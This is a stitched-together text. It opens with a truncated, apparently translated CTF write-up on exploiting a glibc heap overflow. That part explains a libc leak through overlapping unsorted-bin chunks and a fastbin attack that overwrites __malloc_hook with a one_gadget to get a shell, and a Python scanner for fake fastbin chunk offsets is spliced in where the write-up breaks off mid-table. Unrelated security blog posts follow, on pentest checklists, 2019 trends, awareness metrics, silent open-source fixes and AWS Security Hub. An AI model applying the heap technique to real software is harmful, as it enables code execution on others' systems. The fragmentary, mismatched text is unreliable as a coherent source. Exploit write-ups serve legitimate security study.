1. Fastbins are singly linked lists, several of them, one per chunk size in increasing order. When the user frees a chunk whose size is in the fastbin range (and, with TRIM_FASTBINS enabled, which is not adjacent to the top chunk), it is linked into the fastbin for that size.

2. Each fastbin is a LIFO stack: freed chunks are inserted at the head, right behind the bin header, and each chunk's fd points at the next chunk towards the tail (head and tail relative to the bin header).

3. Roughly, insertion is chunk->fd = fastbinsY[idx]; fastbinsY[idx] = chunk; and the matching removal is fastbinsY[idx] = fastbinsY[idx]->fd (that is the idea; read the glibc source for the exact code).

4. Fastbin security checks. The head double-free check: before a chunk goes into a fastbin, the first chunk of that list is compared with it, and if they are the same it is a double free and the program aborts. The size check on allocation: when a chunk is taken out of a fastbin, its size field is checked to confirm that the chunk really belongs to that fastbin, and if the size is not a legal chunk size for the current fastbin the program aborts. The check computes the index the size belongs to, ((((unsigned int)(sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2), and compares it with the index of the fastbin the chunk was taken from.

5. Fastbin chunk headers: the prev_size of the following chunk stays 0 and its PREV_INUSE bit stays set, so fastbin chunks are never consolidated (consistent with the original design goal of keeping small chunks resident for speed).

6. The fastbin attack: use some means to point a chunk's fd at a target memory region (whose corresponding size field must of course hold a legal value). Once that chunk has been returned by malloc, the next malloc of that size returns the target region, and we can do whatever we like with it (it may hold critical data or a function pointer).

Now the analysis proper:

The main plan is to leak libc's base address first, then use a fastbin attack to overwrite a function pointer inside libc, so that execution is hijacked when it is called and we get a shell.

0x01 Leaking libc_base

The only place with any output is print_log(), so the leak has to go through it.

It prints chunk contents, so the natural idea is to leak a chunk's fd and bk pointers and derive libc_base from them.

Fastbin chunks are ruled out right away: a fastbin chunk only has fd, no bk, and since the list is singly linked with fd pointing towards the tail, fd can only point at another heap chunk, never at the bin header in libc, so there is no offset from which to compute libc_base.

So libc_base has to be leaked through the unsorted bin!

Obstacles: the read length is capped at the size requested when the chunk was created; calloc zeroes the user area, so leftover fd and bk pointers are wiped; and a chunk can only be printed while its index-table exist flag is set.

First consider how to get around calloc and the exist flag. If we want to read fd and bk they must not have been zeroed, so the chunk holding them must be free, but then its exist flag is clear and it cannot be printed.

So it seems we can only print chunks that are marked exist (in use), yet we need to read what is inside a freed chunk.

In other words, printing an in-use chunk must reveal the contents of some freed chunk.

The only way that can happen is if the in-use chunk's Size in the index table is large enough to cover a freed chunk as well, so that printing the in-use chunk also prints the freed chunk's fd and bk.

Below, Size denotes this sufficiently large length.

That Size is entered by the user at new_log() time, so it is also what gets passed to calloc, and calloc zeroes the whole area. The chunk we are going to cover therefore cannot be freed before the calloc (its fd and bk would be wiped); it must still be in use when calloc runs, be freed afterwards, and only then do we print the calloc'd chunk to leak.

Which raises the question: how can calloc(Size) return a chunk that already contains another, in-use chunk? A calloc'd chunk comes from one of two places: an existing chunk in the bins, or a piece split off the top chunk. It obviously cannot be the latter, so it must be taken straight out of a bin, which means a chunk of size Size must already be sitting in a bin beforehand (because of what it carries we will call this Size-sized chunk the "pregnant chunk", prgnt chunk).

So how do we construct such a prgnt chunk in the bins? Put differently, how do we make it "carry" the chunk we want to leak from? Any experienced pwner sees it after a moment's thought: forge the size field, and the tool for that is naturally the heap overflow!

If we can overwrite the size field of the chunk preceding the "fetus chunk" (that preceding chunk, sitting in the bins, is the prgnt chunk) with a larger value, large enough to swallow the fetus chunk (that is, with Size), then when the user calls new_log() with input length Size, calloc(Size) finds our forged chunk with size field Size in the bins and hands it out, and we get exactly what we need: a prgnt chunk of the required size that contains an in-use fetus chunk.

Once we hold the prgnt chunk, we call edit_log() on it to write legal prev_size and size fields back into the still-in-use fetus chunk (they were zeroed), free the fetus chunk (now it has fd and bk), and call print_log() on the prgnt chunk to read out the fetus chunk's fd and bk (this is the calloc, then free, then print sequence mentioned above).

Clearly both the prgnt chunk and the fetus chunk must be unsorted-bin sized chunks; we also need a guard chunk after them so that nothing gets consolidated into the top chunk, and some chunk in front to launch the overflow from, so four chunks in total, all of unsorted-bin size.

What leaks is the address of main_arena's unsorted bin; subtracting its offset gives libc_base.

0x02 Fastbin attack

First free a chunk into a fastbin, overflow into it to overwrite its fd so that it points near __malloc_hook, then calloc twice and we hold a user pointer into the memory around __malloc_hook. Overwrite __malloc_hook with the address we want to hijack to (a one_gadget, say); the next time new_log() calls calloc, execution is diverted to the one_gadget and we get a shell.

0x03 Important technical details

Hook hijacking, RELRO, misaligned size construction, one_gadget

To hijack a function pointer we usually overwrite the GOT, but as far as I have seen there are at least two situations where GOT hijacking does not work: full RELRO, and the fastbin size-alignment requirement.

RELRO is a mitigation that hardens the data segment: when it is fully enabled, the GOT is not lazily bound but resolved entirely at load time and then made read-only, so it can no longer be overwritten.

The size misalignment is exactly today's situation. As noted above, one of the fastbin checks is size validation: to redirect fd at the target memory and have it handed out, there must be a qword near the target that can serve as a legal size field and pass the check. That is what we call misaligned size construction. In practice no such qword seems to exist inside the GOT, so a fastbin attack against the GOT is not viable.

So in a fastbin attack we go after a hook instead. A hook is a function pointer that glibc consults before running the real allocator; the hooks were designed for debugging, roughly in the form func_hook(*func, <args>): when a function's hook is set, the hook is called first and may then call back into the real function. calloc and malloc share the same hook, __malloc_hook:


(definition of malloc in the glibc 2.23 source)

(definition of malloc in IDA)

(definition of calloc in the glibc 2.23 source)

(definition of calloc in IDA)

All four figures show that malloc/calloc check whether __malloc_hook is set before running their core code, and call it first if it is!

So let's look at the memory around __malloc_hook:

(Figure: hook disassembly window)

__malloc_hook sits right next to main_arena.

Fastbin attacks typically target __malloc_hook precisely because a legal size field can be constructed at a misaligned offset nearby. Let's see in the hex view how that size comes about:

From 0x3C4AF0 to 0x3C4B18, matching the disassembly window above, the qwords are:

0x3C4AF0 _IO_wfile_jumps (last entry)   0x3C4AF8 align 20h
0x3C4B00 __memalign_hook                0x3C4B08 __realloc_hook
0x3C4B10 __malloc_hook                  0x3C4B18 align 20h

Our target is __malloc_hook at 0x3C4B10, and it must fall inside the user area of the chunk we allocate. Searching upward from there for a qword that can serve as a misaligned size field, only 0x3C4AF0 and 0x3C4AF8 come into question, for the following reason:

the align 20h at 0x3C4AF8 is constant, always 00 00 00 00 00 00 00 00, whereas the other slots (the hex shown in the picture is not what is there at runtime) hold real addresses once libc is loaded; with a little experience you can guess that those libc addresses are 6 bytes long with 0x7f as the most significant byte. So there is exactly one spot for a misaligned size: the 0x7f top byte of the address at 0x3C4AF0 followed by the next seven 00 bytes forms the qword 7f 00 00 00 00 00 00 00, which is a legal size field value!

With sz = 0x7f and SIZE_SZ = 8, ((((unsigned int)(sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) gives index 5 (malloc first masks off the three low flag bits, 0x7f & ~7 = 0x78, which yields the same index), so the chunk belongs to fastbin[5]: // the sizes below are request (user area) sizes
Fastbins[idx=0, size=0x10]
Fastbins[idx=1, size=0x20]
Fastbins[idx=2, size=0x30]
Fastbins[idx=3, size=0x40]
Fastbins[idx=4, size=0x50]
Fastbins[idx=5,
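The misaligned-size search above can be done mechanically over a memory dump instead of by eye. The following Python is an added example, not the author's exploit: it implements glibc's `fastbin_index()` (including the cast to `unsigned int`, which is why huge libc addresses never collide with a small index), scans every byte offset of a dump for a qword that passes the size check for a given bin, and keeps only the candidates whose user area covers the pointer we want to overwrite. The dump is constructed to match the layout around `__malloc_hook` described on this page (offset 0x3c4b10, glibc 2.23 x86-64); the libc base and the values in `__memalign_hook` and `__realloc_hook` are hypothetical.

```python
import struct

SIZE_SZ = 8             # 64-bit glibc
SIZE_BITS = 0x7         # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA flag bits in a size field


def chunksize(size_field):
    """glibc chunksize(): strip the three flag bits."""
    return size_field & ~SIZE_BITS


def fastbin_index(sz):
    """glibc fastbin_index(): the cast to unsigned int truncates sz to 32 bits before shifting."""
    return ((sz & 0xFFFFFFFF) >> (4 if SIZE_SZ == 8 else 3)) - 2


def fastbin_chunk_size(idx):
    """Chunk size served by fastbinsY[idx]: 0x20, 0x30, ..., 0x80 on 64-bit."""
    return (idx + 2) * 2 * SIZE_SZ


def request_range_for_index(idx):
    """Inclusive range of malloc/calloc request sizes that land in fastbinsY[idx]."""
    chunk = fastbin_chunk_size(idx)
    lo = 0 if idx == 0 else chunk - 2 * SIZE_SZ - (SIZE_SZ - 1)
    return lo, chunk - SIZE_SZ


def find_fake_fastbin_chunks(mem, mem_base, idx, target):
    """Scan every byte offset of a memory dump for a qword that fastbin_index() maps to idx,
    treat it as a chunk size field, and keep the candidates whose user area covers `target`."""
    want = fastbin_chunk_size(idx)
    found = []
    for off in range(len(mem) - SIZE_SZ + 1):
        size_field = struct.unpack_from("<Q", mem, off)[0]
        if fastbin_index(chunksize(size_field)) != idx:
            continue
        chunk = mem_base + off - SIZE_SZ          # the size field sits 8 bytes into the chunk
        user = chunk + 2 * SIZE_SZ
        if user <= target < chunk + want:
            found.append({"chunk": chunk, "size_field": size_field,
                          "user_ptr": user, "padding": target - user})
    return found


# Constructed dump of the bytes around __malloc_hook in glibc 2.23 (x86-64), laid out as in the
# author's hex view: the last _IO_wfile_jumps entries, 8 bytes of alignment, __memalign_hook and
# __realloc_hook holding libc text addresses, __malloc_hook unset, more alignment.
LIBC_BASE = 0x7F1234000000                      # hypothetical, page-aligned libc base
MALLOC_HOOK = LIBC_BASE + 0x3C4B10              # __malloc_hook offset from the author's libc dump
DUMP_BASE = MALLOC_HOOK - 0x30
DUMP = struct.pack(
    "<8Q",
    LIBC_BASE + 0x7A2B0, LIBC_BASE + 0x7A2C0, LIBC_BASE + 0x7A2D0,   # _IO_wfile_jumps entries
    0,                                                                # align 20h
    LIBC_BASE + 0x83A80, LIBC_BASE + 0x83B90,                         # __memalign_hook, __realloc_hook
    0, 0,                                                             # __malloc_hook, align 20h
)


def fake_chunk_for_malloc_hook(mem=DUMP, mem_base=DUMP_BASE, target=MALLOC_HOOK):
    """The classic result: size field 0x7f at __malloc_hook - 0x1b, chunk at __malloc_hook - 0x23."""
    candidates = find_fake_fastbin_chunks(mem, mem_base, fastbin_index(chunksize(0x7F)), target)
    return candidates[0] if candidates else None


if __name__ == "__main__":
    c = fake_chunk_for_malloc_hook()
    lo, hi = request_range_for_index(5)
    print("fake chunk at __malloc_hook - 0x%x, request 0x%x..0x%x, padding before hook 0x%x"
          % (MALLOC_HOOK - c["chunk"], lo, hi, c["padding"]))
```

The scan reports one usable candidate: the chunk whose size field is the `7f 00 00 00 00 00 00 00` qword at 0x3C4AF5, i.e. a fake chunk at `__malloc_hook - 0x23`. Its user area begins 0x13 bytes before `__malloc_hook`, so the overwritten fd must point at `__malloc_hook - 0x23`, the two allocations must request a size in the 0x59 to 0x68 range (the author's table uses 0x60), and the write into the second allocation is 0x13 bytes of padding followed by the one_gadget address. The second `0x7f` candidate the scan finds at 0x3C4B0D is dropped because its user area would start past `__malloc_hook`.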

Web Application Penetration Testing Checklist Overview


Penetration testing is the practice of analysing an application with qualified security professionals (penetration testers, or ethical hackers) in order to find its security vulnerabilities. The aim of such a test is to fix the weaknesses the software may contain so that they cannot be exploited easily by an attacker.

Web application pen testing

In the case of web application penetration testing, the software being tested is a web application hosted on a remote server that clients reach over the Internet. Web applications are easy targets for attackers, so it is critical that their developers carry out penetration testing regularly to keep their applications free of security vulnerabilities and malware.

In this post, let us look at some of the elements every web application penetration testing checklist should contain for your web testing to be effective.

Web application pen testing checklist

Contact form testing

The preferred entry point for spammers is often a web application's contact form. The contact form in your web application therefore needs to be able to identify and block such spam attacks; adding a CAPTCHA is one of the simplest ways of preventing contact form spamming.

You can read the full article at https://testingxperts.blogspot.com/2018/12/web-application-penetration-testing.html

The Year Ahead: Cybersecurity Trends To Look Out for In 2019

A Proven Record Tracking Cybersecurity Trends

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security , and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see taking center stage in 2019.

2018 brought with it the proliferation of both data and application security events and, as we predicted, data breaches grew in size and frequency and cloud security took center stage globally. With that in mind, let’s take a look at what next year holds.

Data breaches aren’t going away anytime soon, which will bolster regulation and subsequent compliance initiatives

Look, there’ll be breaches, and the result of that is going to be more regulation, and therefore, more compliance, this is a given. In fact, the average cost of a data breach in the US 2018 exceeded $7 million.

Whether it’s GDPR , the Australian Privacy Law, Thailand’s new privacy laws or Turkey’s KVKK; it doesn’t matter where you are, regulation is becoming the standard whether it be a regional, group, or an individual country standard.

Traditionally when we looked at data breaches, the United States lit up the map, but as regulatory frameworks and subsequent compliance measures expand globally, we’re going to see a change.


The annual number of data breaches and exposed records in the United States from 2005 to 2018 (in millions) [Statista]

What you’ll see in 2019, and certainly as we move forward, is a red rosy glow covering the entire globe. In 2019 you’ll hear more of “It’s not just the United States. This happens everywhere.”

Let’s unpack this for a second. If you were going to steal private data or credit card details, why would you do it in an environment that has world-class, or even mediocre cybersecurity measures in place? If everyone else is even slightly less protected, that’s where you’re going to find people targeting data, but we hear more about it in regions where regulation and compliance is a major focus.

To that end, we don’t necessarily see 2019 as the year where regulators start hitting companies with massive fines for compliance . Maybe by the end of the year, or if you see outright egregious negligence. But, you’ll find that companies have put in the legwork when it comes to compliance.

Having your head in the cloud(s) when it comes to managing risk… not a bad idea

McKinsey reports that, by 2020, organizations will be spending more than six times on cloud-specific products than they do on general IT services; and according to a survey by LogicMonitor , up to 83% of all enterprise workloads will be in the cloud around that same time.


LogicMonitor’s Future of the Cloud Study [Forbes]

Organizations continue to capitalize on the business benefits of the digital economy and, as such, end up chunking more data into the cloud. Now, we’re not saying that this is being done without some forethought, but are they classifying data as they go along and increasingly open their businesses up to the cloud?

Teams need to recognize that, as they transition their data to the cloud, they transition their awareness of what’s in the cloud; who is using it, when they’re using it, and why they’re using it. 2019 isn’t going be the year that businesses figure out they need to do that. What we will see, however, is increasingly cloud-friendly solutions hit the market to solve these challenges.

Social Engineering and the rise of AI and machine learning in meeting staffing issues

One of 2019’s most critical developments will be how the cybersecurity industry steps up to meet the increasing pressure on security teams to perform. According to the Global Information Security Workforce Study , the shortage of cybersecurity professionals will hit 1.8 million by 2022, but at the same time, a report by ESG shows just nine percent of millennials are interested in a career in cybersecurity.

What we’re going to see is how AI and machine learning in cybersecurity technology will close the gaps in both numbers and diversity of skills.

Organizations today have to solve the problem of cybersecurity by hiring for a host of specialized competencies; network security, application security, data security, email security and now, cloud security. Whatever it is, underscore security, those skills are crucial to any organization’s security posture.

Here’s the thing, there aren’t a lot of people that claim to know cloud security, database security, application security, data security, or file security. There just isn’t a lot. We know that and we know businesses are trying to solve that problem, often by doing the same old things they’ve always done, which is the most common solution. Do more antimalware, do more antivirus, do more things that don’t work. In some cases, however, they’re doing things around AI and trying to solve the problem by leveraging technology. The latter will lead to a shift where organizations dive into subscription services.

There are two facets driving this behavior: the first is the fact that, yes, they realize that they are not the experts, but that there are experts out there. Unfortunately, they just don’t work for them, they work for the companies that are offering this as a service.

Secondly, companies are recognizing that there’s an advantage in going to the cloud, because, and this is a major determining factor, it’s an OpEx, not CapEx. The same thing is true of subscription services whether that be in the cloud or on-prem, it doesn’t matter. Driven by skills shortages and cost, 2019 will see an upswing in subscription services, where organizations are actually solving cybersecurity problems for you.

We should add here, however, that as more organizations turn to AI and machine learning-based decision making for their security controls, attackers will try to leverage that to overcome those same defenses.

Special mention:

How to Measure the Success of Your Security Awareness Program


Depending on the size and needs of your organization, a security awareness program usually equals a significant investment of time and funds. However, a program that is properly designed will assist in helping to reduce the number of security incidents affecting your environment. Since this is such a valuable tool, how can an organization determine if the plan they’ve “purchased” is working?

As always, we need to gather data to see how we’re doing. What should we be looking at?

This article will discuss options for obtaining the needed information and how you can use that data to further refine your awareness program.

Create a System for the Reporting and Resolution of Incidents

With any security program, one of the first items that should be in place is a notification system or process where employees can report incidents. Perhaps your organization already has this in place as part of your help desk functions or first-tier technical support.

It would be beneficial if this team is using a searchable database to log all reported issues in the form of work tickets. This database should also allow exports of data and be able to search according to incident type, date range, number of occurrences, severity, total amount of incidents opened and closed and length of time it took to close (in days and hours).

Security Incident Types

Logging the incident type is very important, as this will allow you to measure different aspects of your awareness program and help you understand where your training may need to be tweaked. Below are some examples of incident types that can be used for this purpose.

Phishing: logs any attempt to lure your employees to malicious sites or to request confidential information via email
Credential compromise: any account password that has been compromised
Breach: logs any issue involving unauthorized access to any asset
Policy violation: records any violation of policy, such as installation of unauthorized software or inappropriate use of assets
Edge probes: tracks any incident where an alert is reported due to this activity
Employee inquiry: any question or request for guidance from employees
Stolen asset: stolen hardware or devices
Malware: records any report of malicious software
Investigation: tracks any security investigation required of the security team
Social engineering: logs phone scams and other social engineering attacks
Account lockouts

As your security team begins to go through their work tickets, you’ll start to see trends in the types of issues that are addressed. Depending on how granular your database can get, you can start creating reports to show where employees need the most help and where the awareness program can be modified.

Once the desired metrics are identified, it will be very important to establish the frequency in which these metrics should be monitored. This allows key metrics to be reviewed in order of priority and ensure that none are missed.

SIEM Tools

Having a functioning Security Information and Event Management (SIEM) tool in your environment is also invaluable, as this provides detailed data points regarding your network. These tools can identify items such as rate of infection, network anomalies and authentication failures across the entire monitored environment. For example, how many times does an alert for a particular infection get reported in your SIEM? Is it usually the same individual that falls victim to the issue in question? Depending on the answers to your unique questions, this will show where your program is succeeding or failing.

Human Resources

The InfoSec team and Human Resource representatives can also work together to increase security and awareness. When new employees are hired, have a small presentation prepared as part of their orientation. During this brief presentation, a security representative can speak about some of the threats facing the organization and how each employee can contribute to the security posture of the company. HR can ensure that each employee understands company policies and answer any questions that may arise as a result. If these questions are logged, they can be submitted to the security group as another metric.

Depending on the frequency of certain questions, the security team can tweak policies to ensure they are written in a way that clearly communicates their purpose. The same is true of overall security threats. If new employees are asking repeated questions on certain threats this can alert the security group to include certain material in future awareness sessions, so the user base is properly educated.

Awareness Surveys

Consider working with the HR department to disseminate awareness surveys. Small periodic training modules or quizzes can be developed and sent to the employee population as required training. The modules should highlight threats that are actively affecting the organization as per reviewed metrics and then require the employees to answer specific questions around these issues. The rate of incorrect answers can provide insight into current employee knowledge and what can be improved.

Social Engineering Exercises

Social engineering exercises are another active way to test employees’ reactions to certain attack methods and provide valuable metrics to awareness efforts. Contracting with an external partner experienced in this area can help an organization strengthen and empower employees by teaching them the correct manner of handling a wide range of threats. The results provided by the external partner can help to further shape the company’s security awareness program and uncover other areas that may require further attention. This article discusses some items to keep in mind when planning an initiative of this type.

Generate an Incident Dashboard or Scorecard

Once all required metrics are identified, they should be organized into a system similar to a dashboard or scorecard where the results of each metric over a range of time can be seen at a glance in the form of a bar graph or other charting system. For example, one portion of this dashboard should show the metric type and how many occurrences of the issue appeared in a given month. Other sections of the dashboard can show how many individuals repeatedly dealt with a given issue versus how many individuals reporting the issue were new.

Having a section dedicated to the number of hours worked per issue can quickly help to show how much time is being invested by the security group in handling these matters. When the data starts to take form, it may be possible to even create timelines of major problems based on the data trends. Patterns may start to emerge for certain attacks. This can also assist the security group by preparing proactive strategies to address them and provide tailored awareness information at key points in the year.
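The scorecard metrics described above (occurrences per incident type per month, repeat versus first-time reporters, and time to close in hours and days), computed from a ticket export. This is an added example, not tooling from the article; the ticket records are constructed.

```python
"""Scorecard metrics from help-desk tickets: occurrences per incident type
per month, repeat versus first-time reporters, and time to close in hours
and days. Added example, not tooling from the article; the ticket records
below are constructed in the shape of a work-ticket database export."""
from collections import Counter, defaultdict
from datetime import datetime

FMT = "%Y-%m-%d %H:%M"

# Constructed sample export; "closed" is None for tickets still open.
TICKETS = [
    {"id": 1, "type": "Phishing", "reporter": "alice",
     "opened": "2018-09-03 09:10", "closed": "2018-09-03 11:40"},
    {"id": 2, "type": "Phishing", "reporter": "bob",
     "opened": "2018-09-05 14:00", "closed": "2018-09-06 10:00"},
    {"id": 3, "type": "Malware", "reporter": "carol",
     "opened": "2018-09-20 08:30", "closed": "2018-09-22 08:30"},
    {"id": 4, "type": "Phishing", "reporter": "alice",
     "opened": "2018-10-01 10:00", "closed": "2018-10-01 12:00"},
    {"id": 5, "type": "Policy violation", "reporter": "dave",
     "opened": "2018-10-11 16:00", "closed": None},
    {"id": 6, "type": "Phishing", "reporter": "erin",
     "opened": "2018-10-15 09:00", "closed": "2018-10-15 09:30"},
]


def monthly_counts(tickets):
    """{(YYYY-MM, incident type): occurrences}: the per-month bar series."""
    counts = Counter()
    for t in tickets:
        month = datetime.strptime(t["opened"], FMT).strftime("%Y-%m")
        counts[(month, t["type"])] += 1
    return dict(counts)


def repeat_vs_new(tickets, incident_type):
    """Reporters who raised this incident type more than once versus once only;
    repeat reporters are where tailored awareness material pays off."""
    per_reporter = Counter(t["reporter"] for t in tickets if t["type"] == incident_type)
    return {
        "repeat": sorted(r for r, n in per_reporter.items() if n > 1),
        "new": sorted(r for r, n in per_reporter.items() if n == 1),
    }


def time_to_close(tickets):
    """Per incident type: closed/open counts and mean time to close.
    Open tickets count toward the backlog but not toward the mean."""
    hours = defaultdict(list)
    still_open = Counter()
    for t in tickets:
        if t["closed"] is None:
            still_open[t["type"]] += 1
            continue
        delta = datetime.strptime(t["closed"], FMT) - datetime.strptime(t["opened"], FMT)
        hours[t["type"]].append(delta.total_seconds() / 3600)
    report = {}
    for typ in set(hours) | set(still_open):
        closed = hours.get(typ, [])
        mean_h = round(sum(closed) / len(closed), 2) if closed else None
        report[typ] = {
            "closed": len(closed),
            "open": still_open[typ],
            "mean_hours": mean_h,
            "mean_days": round(mean_h / 24, 2) if mean_h is not None else None,
        }
    return report


if __name__ == "__main__":
    for key, n in sorted(monthly_counts(TICKETS).items()):
        print(key, n)
    print(repeat_vs_new(TICKETS, "Phishing"))
    for typ, row in sorted(time_to_close(TICKETS).items()):
        print(typ, row)
```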


Yearly Awareness Day Event

In line with this thought of “key points in the year,” some companies have organized yearly Awareness Days that employees can attend in order to learn about the emerging threats that are impacting the organization and how they can protect themselves. These events can be planned using trade shows as a model. This type of environment is casual and presents many opportunities for employees to engage the security team and ask specific questions. The security team can also design demonstrations of certain threats to illustrate how they occur, which will help cement the ideas in the minds of the attendees.

Employing teaching tools such as educational games that have the aim of testing the employee’s knowledge of specific security subjects is also very useful during these events.

Conclusion

During this article, we’ve reviewed certain methods that can be employed to measure improvements in employee behavior when it comes to security matters. The metrics that are created as a result of using some of these methods can quickly help a security team understand how deeply the awareness program is impacting their organization and determine the maturity of their particular educational program.


These Silent Fixes are Silent Killers in Open Source Security


When it comes to open source software, it’s natural for development and security leaders to want to know that the code they’re using is secure. Historically, they’ve relied on traditional software composition analysis solutions and the National Vulnerability Database to mine for open source issues. Yet there is a little-discussed fact that open source begets open source. We know that developers use open source libraries to speed up the development process by adding ready-made functionality to their code. The libraries that they select and use are called direct dependencies, and often times, those direct dependencies have dependencies of their own.

Just like any other piece of software, open source libraries often rely on other open source libraries to achieve the desired functionality and goal. When developers choose an open source library, they may not be aware of the indirect dependencies they are stitching into their software. At Veracode, we’ve seen anywhere from two to more than 10 levels of libraries being called on, one after the other. Once you start assessing each level of library, the volume of vulnerabilities can skyrocket beyond your team’s ability to manage them.

Using software composition analysis is an amazing first step to solving some of this open source risk, but what happens when an open source library contributor fixes a security vulnerability and doesn’t tell anyone? Or the time between submission and publication, with an organization like the National Vulnerability Database, is too long to wait?

A Database Is Only as Good as the Data it Captures

The National Vulnerability Database (NVD), upon which most traditional SCA solutions rely, is a robust and widely used source of vulnerability data available today, cataloguing tens of thousands of vulnerabilities across all application types and open source libraries. While it is no doubt a valuable and necessary library of flaws and fixes, through no fault of its own, the organization is unable to keep pace with the volume of vulnerabilities disclosed and updated on a daily basis. Open source library vulnerabilities get stuck in a logjam behind everything else that is disclosed.

It’s important to note that vulnerabilities only make it into the database if a software developer or independent security researcher submits them. It’s common for a vulnerability to be fixed but never disclosed or submitted to the NVD. For example, the Apache Struts Remote Code Execution vulnerability, the same type that led to the Equifax breach in 2017, was disclosed to the public in August 2018 but had been patched in April of that same year.

Four months is plenty of time for malicious actors looking to take advantage of vulnerable software. If they were monitoring the commit logs of the library, they would have been aware of it before organizations could update to the latest version of the component.

Machine Learning and Natural Language Close the Gap

Machine learning technology has the ability to automate the identification of potential security vulnerabilities from commit messages and bug reports. In open source projects, bugs are typically tracked with issue trackers, and code changes are merged in the form of commits to source control repositories. If an organization is able to monitor all of these repositories, and review each new bug issue and commit message, they could identify potential vulnerabilities. However, there are tens of thousands of open source repositories, with hundreds of thousands of bug tracking issues and commit messages to comb through, with new ones hitting every day.

Natural language processing and real machine learning can identify potential vulnerabilities in open source libraries with a high level of accuracy. By analyzing the patterns found in past commit messages and bug-tracking issues using machine learning, our model can identify when new commits or bug issues resemble a silent fix of a potential vulnerability. These potential vulnerabilities are then raised to security researchers.
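A small version of the idea described above: a naive Bayes text classifier trained on labelled commit messages that scores new messages for how much they resemble a silent security fix, so that high-scoring ones can be raised to a researcher. This is an added example, not Veracode's model; the training commits are constructed.

```python
"""Score commit messages for 'looks like a silent security fix' with a
multinomial naive Bayes model over message tokens. Added example, not the
post's or Veracode's model; the labelled training commits are constructed."""
import math
import re
from collections import Counter

SECURITY_FIX = [  # constructed commits that patched a weakness without saying so
    "Fix buffer overflow in packet parser",
    "Sanitize user input to prevent path traversal",
    "Validate certificate hostname before trusting the connection",
    "Escape HTML in error page to avoid script injection",
    "Use constant-time compare for auth token check",
    "Fix out-of-bounds read when parsing malformed header",
    "Prevent directory traversal in file download handler",
    "Reject oversized requests to avoid denial of service",
]
OTHER = [  # constructed ordinary maintenance commits
    "Bump version to 2.3.1",
    "Update README with build instructions",
    "Refactor logging module for readability",
    "Add unit tests for date formatting",
    "Fix typo in changelog",
    "Improve performance of cache lookup",
    "Update dependencies in lockfile",
    "Fix broken link in docs",
]


def tokenize(text):
    """Lower-case word tokens; 'out-of-bounds' becomes out, of, bounds."""
    return re.findall(r"[a-z0-9]+", text.lower())


class NaiveBayes:
    def __init__(self):
        self.word_counts = {}       # label -> Counter of tokens
        self.doc_counts = Counter()  # label -> number of training messages
        self.vocab = set()

    def train(self, labelled):
        for text, label in labelled:
            self.doc_counts[label] += 1
            counts = self.word_counts.setdefault(label, Counter())
            for tok in tokenize(text):
                counts[tok] += 1
                self.vocab.add(tok)

    def log_score(self, tokens, label):
        """log P(label) + sum log P(token | label), add-one smoothed so a
        token never seen under this label does not zero the score."""
        counts = self.word_counts[label]
        total = sum(counts.values())
        score = math.log(self.doc_counts[label] / sum(self.doc_counts.values()))
        for tok in tokens:
            score += math.log((counts[tok] + 1) / (total + len(self.vocab)))
        return score

    def p_security(self, text):
        """Posterior probability of the 'security' label for one message."""
        tokens = tokenize(text)
        sec = self.log_score(tokens, "security")
        other = self.log_score(tokens, "other")
        return 1.0 / (1.0 + math.exp(other - sec))


def build_model():
    model = NaiveBayes()
    model.train([(t, "security") for t in SECURITY_FIX] + [(t, "other") for t in OTHER])
    return model


def triage(messages, threshold=0.5):
    """(message, score) pairs at or above the threshold, highest first:
    the candidates that get raised to a security researcher."""
    model = build_model()
    scored = [(msg, round(model.p_security(msg), 3)) for msg in messages]
    return sorted((s for s in scored if s[1] >= threshold), key=lambda s: -s[1])


if __name__ == "__main__":
    sample = ["Fix overflow when parsing oversized header",
              "Update docs for new build flag", "Fix typo in docs"]
    for msg, score in triage(sample, threshold=0.0):
        print(f"{score:.3f}  {msg}")
```

With this little training set the first sample message scores above 0.9 and the other two below 0.2; a real deployment would train on thousands of labelled commits and tune the threshold against researcher feedback.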

These silent fixes can be a silent killer for your data protection.

Modern Software Composition Analysis Designed for Modern Application Development

We have developed our own database that includes all of the open source vulnerabilities in the NVD, as well as our own list of vulnerabilities in open source libraries that have not yet been disclosed to the NVD. In many cases, the vulnerabilities we find and record have either not been disclosed yet and are in the time between patching and full public disclosure, or in some cases, there was never any intent to disclose the vulnerability and its fix. There is a third category we track, which are “Reserved CVEs.” We take the Reserved CVE IDs from the NVD and then find the vulnerabilities in the public repos, in order to give you a head start on the fix prior to full public disclosure.

To learn more about how to use these silent fixes to your advantage by putting your development team on an even playing field with attackers, download our free white paper: https://info.veracode.com/whitepaper-solving-your-open-source-risk-with-sourceclear.html

AWS Security Hub


A primary concern for companies moving to the cloud is whether or not their workloads will remain secure. While that debate still happens, AWS has made great strides to assuage customers’ concerns by adding services to ensure workloads are well protected. At re:Invent 2018 another service named AWS Security Hub was added. Security Hub allows you to set up some basic security guardrails and get compliance information for multiple accounts within a single service. Amazon seems to have realized that enabling customers to very easily see their security recommendations for all environments in a single place has great value to their businesses.

Set Up AWS Security Hub for Multiple Accounts

To set up AWS Security Hub, we first have to pick an account where our portal will live. Log in to your AWS account of choice and navigate to “Security Hub” in the AWS console. Once you’ve logged in, you’ll need to enable the Security Hub service by clicking the button on the splash screen.


Once you click that button, you’ll be asked again to add Security Hub which will update some policies to give AWS permission to aggregate findings and read information from your accounts.


Once enabled, you’ll see a summary screen with some very uninteresting information on it at this point. To make Security Hub work really well, you’ll need to enable some things which will then be aggregated into the Security Hub console. To begin, we’ll enable the CIS Benchmarks, which are a good baseline for how your cloud should be protected. Now, the important thing here is that the CIS benchmarks are going to use AWS Config rules to ensure that specific cloud security metrics are monitored. Before you enable CIS Standards on the standards menu, be sure to enable AWS Config in the account you’re monitoring. This can be done via CloudFormation or through the console, but be sure to enable AWS Config to record events for the region and globally.


Once Config has been enabled, it’s OK to enable the CIS Standards from the standards menu.


Once the CIS Standards have been enabled, a series of AWS Config Rules will be deployed. These might take a few minutes to show any data, but do note that these Config rules cost $2 per account per region to use. Once Config has evaluated the rules, you should see some data in the AWS Config console if you look at that service. You can see from my screenshot below that there are AWS Config Rules with a prefix of “securityhub” listed in my compliance rules list. You’ll also notice that I have some noncompliant resources, which were intentionally left noncompliant for demonstration purposes.


